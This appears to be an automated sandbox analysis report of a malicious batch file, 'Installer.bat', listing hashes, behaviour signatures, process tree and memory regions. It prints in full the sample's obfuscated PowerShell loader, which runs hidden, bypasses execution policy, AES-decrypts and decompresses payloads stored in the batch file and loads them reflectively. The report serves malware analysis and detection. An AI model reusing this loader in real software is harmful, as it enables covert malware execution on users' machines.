Analysis
-
max time kernel
27s -
max time network
18s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
24-05-2024 03:05
Static task
static1
Behavioral task
behavioral1
Sample
Installer.bat
Resource
win7-20240221-en
windows7-x64
5 signatures
30 seconds
Behavioral task
behavioral2
Sample
Installer.bat
Resource
win10v2004-20240508-en
windows10-2004-x64
17 signatures
30 seconds
General
-
Target
Installer.bat
-
Size
66KB
-
MD5
c51a341d4045678ac21ec499e8c9e992
-
SHA1
0e44988a81ff21a58456c3b782c7a51aafde1358
-
SHA256
f5650b450dedd0a0fec4a59e7412d1312352bd9088c5d2e934f863926b1c5dad
-
SHA512
8c51dd3ab2992871f702b255551f45c6cb2ed937774eac027a87dc4f2e2926a45433b4e56fc8e90dcf40a465d79280c0212c364070bd7e1dd6dfec177a430159
-
SSDEEP
1536:NoQ26vCtla+UARVN2PUPFK9QBib9ZKL/FhtGif3:3hvCvUi2Pi7BiYFhtGif3
Score
8/10
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 2076 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2076 powershell.exe -
Suspicious use of WriteProcessMemory 9 IoCs
Processes:
cmd.exenet.exedescription pid process target process PID 2808 wrote to memory of 2084 2808 cmd.exe net.exe PID 2808 wrote to memory of 2084 2808 cmd.exe net.exe PID 2808 wrote to memory of 2084 2808 cmd.exe net.exe PID 2084 wrote to memory of 2248 2084 net.exe net1.exe PID 2084 wrote to memory of 2248 2084 net.exe net1.exe PID 2084 wrote to memory of 2248 2084 net.exe net1.exe PID 2808 wrote to memory of 2076 2808 cmd.exe powershell.exe PID 2808 wrote to memory of 2076 2808 cmd.exe powershell.exe PID 2808 wrote to memory of 2076 2808 cmd.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\Installer.bat"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet file2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 file3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nXSajZrUqAqKVdHyYRJ6lyU21T//NNE+X+mj0zre9EE='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('U/eGnrmPpGq50sOwe1VcYQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $FZRrB=New-Object System.IO.MemoryStream(,$param_var); $UumYj=New-Object System.IO.MemoryStream; $PwqjF=New-Object System.IO.Compression.GZipStream($FZRrB, [IO.Compression.CompressionMode]::Decompress); $PwqjF.CopyTo($UumYj); $PwqjF.Dispose(); $FZRrB.Dispose(); $UumYj.Dispose(); $UumYj.ToArray();}function execute_function($param_var,$param2_var){ $zsNFP=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XrMDq=$zsNFP.EntryPoint; $XrMDq.Invoke($null, $param2_var);}$iBKJy = 'C:\Users\Admin\AppData\Local\Temp\Installer.bat';$host.UI.RawUI.WindowTitle = $iBKJy;$PJEAO=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($iBKJy).Split([Environment]::NewLine);foreach ($NJOsI in $PJEAO) { if ($NJOsI.StartsWith(':: ')) { $JySyT=$NJOsI.Substring(3); break; }}$payloads_var=[string[]]$JySyT.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/2076-9-0x000007FEF5420000-0x000007FEF5DBD000-memory.dmpFilesize
9.6MB
-
memory/2076-8-0x000007FEF5420000-0x000007FEF5DBD000-memory.dmpFilesize
9.6MB
-
memory/2076-7-0x000007FEF5420000-0x000007FEF5DBD000-memory.dmpFilesize
9.6MB
-
memory/2076-6-0x0000000002220000-0x0000000002228000-memory.dmpFilesize
32KB
-
memory/2076-5-0x000000001B0F0000-0x000000001B3D2000-memory.dmpFilesize
2.9MB
-
memory/2076-4-0x000007FEF56DE000-0x000007FEF56DF000-memory.dmpFilesize
4KB
-
memory/2076-10-0x000007FEF5420000-0x000007FEF5DBD000-memory.dmpFilesize
9.6MB
-
memory/2076-11-0x000007FEF5420000-0x000007FEF5DBD000-memory.dmpFilesize
9.6MB
-
memory/2076-12-0x000007FEF5420000-0x000007FEF5DBD000-memory.dmpFilesize
9.6MB